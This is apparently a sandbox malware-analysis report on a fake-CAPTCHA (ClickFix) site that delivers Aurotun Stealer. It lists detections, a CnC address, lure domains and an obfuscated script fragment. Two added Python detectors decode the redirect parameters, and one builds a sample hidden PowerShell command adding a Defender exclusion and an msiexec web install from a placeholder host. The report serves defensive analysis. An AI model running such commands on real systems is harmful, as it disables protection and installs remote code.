Windows Analysis Report
HTTPS://cogniai.com

General Information

Sample URL: HTTPS://cogniai.com
Analysis ID: 1701089
Infos: yarasigma

Detection

Aurotun Stealer, CAPTCHA Scam ClickFix, MicroClip
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: msiexec download and execute
Suricata IDS alerts for network traffic
Yara detected Aurotun Stealer
Yara detected CAPTCHA Scam ClickFix
Yara detected MicroClip
Adds a directory exclusion to Windows Defender
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: MsiExec Web Install
Sigma detected: Msiexec Initiated Connection
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses cacls to modify the permissions of files
Yara signature match
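The Sigma hits listed above (msiexec download and execute, MsiExec Web Install, Msiexec Initiated Connection, Powershell Base64 Encoded MpPreference Cmdlet, Powershell Defender Exclusion) are all process-creation detections. What follows is an added example, not part of this report, of how an analyst can reproduce them against a process command line: a cheap match for the base64 forms of Add-/Set-MpPreference inside an -EncodedCommand blob (the trick these Sigma rules rely on, because a UTF-16LE keyword has exactly three base64 encodings depending on its byte offset mod 3), a full decode for confirmation, and a check for msiexec installing straight from a URL. The command lines it runs on are constructed for illustration; the report does not print the real ones, and example.invalid is a placeholder host.

```python
"""Reproduce the report's msiexec and Defender-exclusion Sigma hits on a process command line.
Added example, not part of the sandbox report; the command lines below are constructed."""
from __future__ import annotations

import base64
import re
from typing import Optional

# Defender cmdlets/switches that add exclusions (real cmdlet and parameter names).
EXCLUSION_RE = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b"
)
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_ARG_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# msiexec pointed at a remote package (what the 'MsiExec Web Install' rule looks for).
MSIEXEC_WEB_RE = re.compile(r"(?i)\bmsiexec(?:\.exe)?\b.*?(https?://[^\s\"']+)")


def b64_alignments(keyword: str) -> list[str]:
    """The three base64 substrings a UTF-16LE keyword can produce, one per byte offset
    mod 3. Characters that also depend on neighbouring bytes are stripped, so each
    pattern is a stable substring of any -EncodedCommand blob containing the keyword."""
    raw = keyword.encode("utf-16le")
    patterns = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode("ascii").rstrip("=")
        head = (0, 2, 3)[offset]                          # chars mixed with the filler bytes
        tail = 0 if (offset + len(raw)) % 3 == 0 else 1   # char mixed with whatever follows
        patterns.append(enc[head:len(enc) - tail])
    return patterns


MPPREF_PATTERNS = b64_alignments("Add-MpPreference") + b64_alignments("Set-MpPreference")


def flags_encoded_mppreference(cmdline: str) -> bool:
    """Stage 1, no decoding: is any base64 alignment of Add-/Set-MpPreference present?"""
    return any(p in cmdline for p in MPPREF_PATTERNS)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Stage 2: extract and decode the -EncodedCommand blob (base64 of UTF-16LE)."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def defender_exclusion_added(cmdline: str) -> Optional[str]:
    """Return the script text (decoded if needed) when it adds a Defender exclusion."""
    script = decode_encoded_command(cmdline) or cmdline
    return script if EXCLUSION_RE.search(script) else None


def msiexec_web_install(cmdline: str) -> Optional[str]:
    """Return the package URL when msiexec is asked to install straight from the web."""
    m = MSIEXEC_WEB_RE.search(cmdline)
    return m.group(1) if m else None


def encoded_powershell(script: str) -> str:
    """Build the command line the way the attacker would: base64 of UTF-16LE."""
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {blob}"


if __name__ == "__main__":
    # Constructed samples. Three prefixes put the cmdlet at three different byte
    # offsets so each base64 alignment is exercised.
    for prefix in ("", " ", "; "):
        cl = encoded_powershell(prefix + r"Add-MpPreference -ExclusionPath C:\Windows\Temp")
        print(flags_encoded_mppreference(cl), defender_exclusion_added(cl))
    print(msiexec_web_install("msiexec.exe /i https://example.invalid/setup.msi /qn"))  # constructed URL
```

Stage 1 is what keeps the rule cheap enough to run on every process-creation event; stage 2 confirms the hit and recovers the excluded path for the incident record. The same alignment trick works for any keyword you want to spot inside encoded commands without decoding every blob.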

Classification

Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2e64a555-3

Phishing

Source: Yara match File source: 1.21.o.script.csv, type: HTML
Source: Yara match File source: 1.1.pages.csv, type: HTML
Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP Parser: (function(_0x44a4fe,_0x26438d){function _0xc2516c(_0x4d2ab2,_0x1c424f,_0x48d53b,_0x51657b,_0x5d6b73
Source: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: `\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb&l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 4\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb,lg source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642B source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2\??\C:\Users\user\AppData\Local\Temp\Win11Debloatrod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb3d8bbwe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: h\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local Statef source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb)l` source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 9C:\Users\user\AppData\Local\Temp\Win11Debloat\d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb=l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642t source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\cal State\EBWebView source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State^ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb0447 source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbeData source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb1.0-7e3544113374bc2769af5f67e125ab81de1b4b64c07fe68e2a7bc03646c85dfc source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb#lj source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21G source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642ate\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbRl} source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 6MB later: 78MB

Networking

Source: Network traffic Suricata IDS: 2061200 - Severity 1 - ET MALWARE Aurotun Stealer CnC Checkin : 192.168.2.24:49724 -> 91.200.14.69:7712
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: analytiscnode.com to https://security.flaweguaard.com/9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c?wsid=cogniai.com&domain=y29nbmlhas5jb20%3d&link=ahr0chm6ly9jb2duawfplmnvbs93cc1jb250zw50l3vwbg9hzhmvmjaymy8xms90ahvtyl9dt0dosufjlunvbmnlchq5luzgltaxlteucg5n
Source: Network traffic Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:59573 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51544 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49696 -> 104.21.68.46:443
Source: Network traffic Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:57274 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061639 - Severity 2 - ET EXPLOIT_KIT Fake Captcha Domain (analytiwave .com) in DNS Lookup : 192.168.2.24:51796 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061646 - Severity 2 - ET EXPLOIT_KIT Observed Fake Captcha Domain (analytiwave .com) in TLS SNI : 192.168.2.24:49710 -> 172.67.186.167:443
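The redirect above is the ClickFix hand-off: analytiscnode.com sends the browser to security.flaweguaard.com with the victim site encoded in the query string (the same landing URL appears, case intact, as the HTTP Parser source under Phishing). Below is an added example, not part of the report, that decodes those parameters. Both URLs are copied from the report; the redirect line is printed lower-cased by the sandbox, which destroys the base64, so the decoder has to cope with blobs that cannot be recovered.

```python
"""Decode the base64 query parameters of the ClickFix redirect recorded in this report.
Added example, not part of the sandbox report. The two URLs are copied from it."""
from __future__ import annotations

import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Case-preserved landing URL (HTTP Parser entry under Phishing).
LANDING_URL = (
    "https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D"
    "&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n"
)
# Redirect target as the sandbox printed it: lower-cased, so the base64 is damaged.
REDIRECT_URL = (
    "https://security.flaweguaard.com/9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c"
    "?wsid=cogniai.com&domain=y29nbmlhas5jb20%3d"
    "&link=ahr0chm6ly9jb2duawfplmnvbs93cc1jb250zw50l3vwbg9hzhmvmjaymy8xms90ahvtyl9dt0dosufjlunvbmnlchq5luzgltaxlteucg5n"
)


def b64_text(value: str) -> Optional[str]:
    """Base64-decode to printable ASCII. Returns None when the blob is empty, is not
    valid base64, or does not decode to text (what a case-folded log leaves behind)."""
    if not value:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_clickfix_url(url: str) -> dict:
    """Pull domain/link/wsid out of the query string and cross-check them."""
    qs = parse_qs(urlsplit(url).query)  # parse_qs also undoes the %3D padding

    def first(key: str) -> Optional[str]:
        return qs.get(key, [None])[0]

    domain = b64_text(first("domain") or "")
    link = b64_text(first("link") or "")
    wsid = first("wsid")
    link_host = urlsplit(link).hostname if link else None
    return {
        "impersonated_domain": domain,   # site the fake CAPTCHA pretends to be
        "branding_asset": link,          # usually that site's own logo image
        "wsid": wsid,                    # plaintext copy of the domain, when present
        "consistent": domain is not None
        and link_host == domain
        and (wsid is None or wsid == domain),
    }


if __name__ == "__main__":
    for url in (LANDING_URL, REDIRECT_URL):
        print(decode_clickfix_url(url))
```

The decoded link is the site's own logo (the thumb_COGNIAI-Concept9-FF-01-1.png fetched later in this section), which the fake CAPTCHA page uses to pass itself off as cogniai.com; the consistent flag checks that domain, link host and wsid agree. When pulling IOCs, take the case-preserved URL from the HTTP Parser entries: the lower-cased redirect string decodes to nothing usable.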
Source: unknown TCP traffic detected without corresponding DNS query: 13.69.109.130 (7 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197 (24 connections; the TLS 1.2 peer listed under Phishing)
Source: unknown TCP traffic detected without corresponding DNS query: 91.200.14.69 (19 connections; the Aurotun Stealer CnC host from the Suricata alert above, port 7712)
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    host: cogniai.com
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    upgrade-insecure-requests: 1
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    sec-fetch-site: none
    sec-fetch-mode: navigate
    sec-fetch-user: ?1
    sec-fetch-dest: document
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0, i
